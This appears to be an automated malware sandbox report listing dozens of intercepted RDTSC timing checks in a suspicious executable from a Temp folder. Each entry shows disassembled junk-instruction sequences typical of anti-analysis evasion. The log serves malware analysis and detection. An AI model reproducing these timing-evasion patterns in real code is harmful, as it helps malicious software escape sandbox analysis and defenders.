                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 40968A second address: 4096A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4784F102D3h 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4096A5 second address: 4096A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4096A9 second address: 4096C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4784F102D3h 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4096C7 second address: 4096E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F4785B0BF56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4096E8 second address: 4096FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4784F102CEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4099E1 second address: 4099FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF4Ch 0x00000009 popad 0x0000000a jo 00007F4785B0BF52h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4099FA second address: 409A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 409CA3 second address: 409CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F4785B0BF4Bh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 409CB6 second address: 409CBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 409F41 second address: 409F4B instructions: 0x00000000 rdtsc 0x00000002 je 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4100D5 second address: 4100DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4100DA second address: 4100E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4100E0 second address: 4100E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4100E6 second address: 4100EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41303D second address: 413078 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d jo 00007F4784F102D8h 0x00000013 jmp 00007F4784F102D2h 0x00000018 jc 00007F4784F102D2h 0x0000001e jg 00007F4784F102C6h 0x00000024 jo 00007F4784F102C6h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4132EB second address: 4132F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F4785B0BF46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41341B second address: 413422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 413422 second address: 413498 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4785B0BF51h 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007F4785B0BF46h 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F4785B0BF51h 0x0000001c push esi 0x0000001d pop esi 0x0000001e jmp 00007F4785B0BF4Eh 0x00000023 jmp 00007F4785B0BF54h 0x00000028 popad 0x00000029 jnl 00007F4785B0BF5Eh 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41379E second address: 4137A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4137A2 second address: 4137DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4785B0BF4Ah 0x0000000d jmp 00007F4785B0BF52h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jmp 00007F4785B0BF4Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4137DD second address: 4137F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007F4784F102C6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F4784F102CAh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4137F9 second address: 4137FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4137FE second address: 413805 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 413805 second address: 41380E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41380E second address: 413814 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 413972 second address: 413990 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F4785B0BF58h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 413990 second address: 4139A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4784F102CAh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4139A6 second address: 4139AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 413C89 second address: 413C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 413C8D second address: 413C93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41B8F2 second address: 41B925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D2h 0x00000007 jmp 00007F4784F102CBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jbe 00007F4784F102C6h 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F4784F102C6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41B925 second address: 41B929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 367E69 second address: 367E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 419B3D second address: 419B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 419B45 second address: 419B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 419B49 second address: 419B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 419B4D second address: 419B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4784F102C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41A31C second address: 41A325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41A325 second address: 41A329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41A5EA second address: 41A5F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4785B0BF46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41A9E1 second address: 41A9E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41A9E5 second address: 41A9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41A9EB second address: 41A9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41A9F1 second address: 41A9F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 41A9F7 second address: 41AA13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F4784F102C6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 423071 second address: 423093 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4785B0BF46h 0x00000008 jo 00007F4785B0BF46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F4785B0BF52h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 423093 second address: 4230B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F4784F102C6h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4784F102D2h 0x00000013 jp 00007F4784F102C6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4230B9 second address: 4230BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 422A02 second address: 422A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 422A06 second address: 422A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jc 00007F4785B0BF56h 0x0000000e jmp 00007F4785B0BF50h 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop edx 0x00000017 jmp 00007F4785B0BF4Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4785B0BF4Eh 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 42E2F5 second address: 42E338 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4784F102D6h 0x00000008 pop edi 0x00000009 jmp 00007F4784F102CDh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F4784F102CFh 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F4784F102C6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 42E338 second address: 42E33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 42DE58 second address: 42DE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4784F102C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F4784F102D2h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4335C3 second address: 4335E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF58h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4335E1 second address: 433600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4784F102CEh 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F4784F102C6h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4395B0 second address: 4395B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 43B754 second address: 43B766 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 443B49 second address: 443B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 443B4E second address: 443B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 443B54 second address: 443B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4508BB second address: 4508D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4508D6 second address: 4508DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4508DE second address: 4508FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007F4784F102D3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4508FB second address: 45091E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F4785B0BF4Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4785B0BF50h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 45091E second address: 450922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44F9D2 second address: 44F9DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44F9DB second address: 44F9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44F9DF second address: 44F9F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Ah 0x00000007 jnc 00007F4785B0BF46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44F9F3 second address: 44F9FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44F9FB second address: 44F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44F9FF second address: 44FA03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44FA03 second address: 44FA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF56h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44FA23 second address: 44FA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4784F102D3h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44FA3A second address: 44FA46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44FBDD second address: 44FBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44FBE2 second address: 44FC21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF56h 0x00000007 pushad 0x00000008 jmp 00007F4785B0BF4Fh 0x0000000d jmp 00007F4785B0BF55h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44FC21 second address: 44FC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44FC2C second address: 44FC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4785B0BF46h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44FC3C second address: 44FC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 44FC44 second address: 44FC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
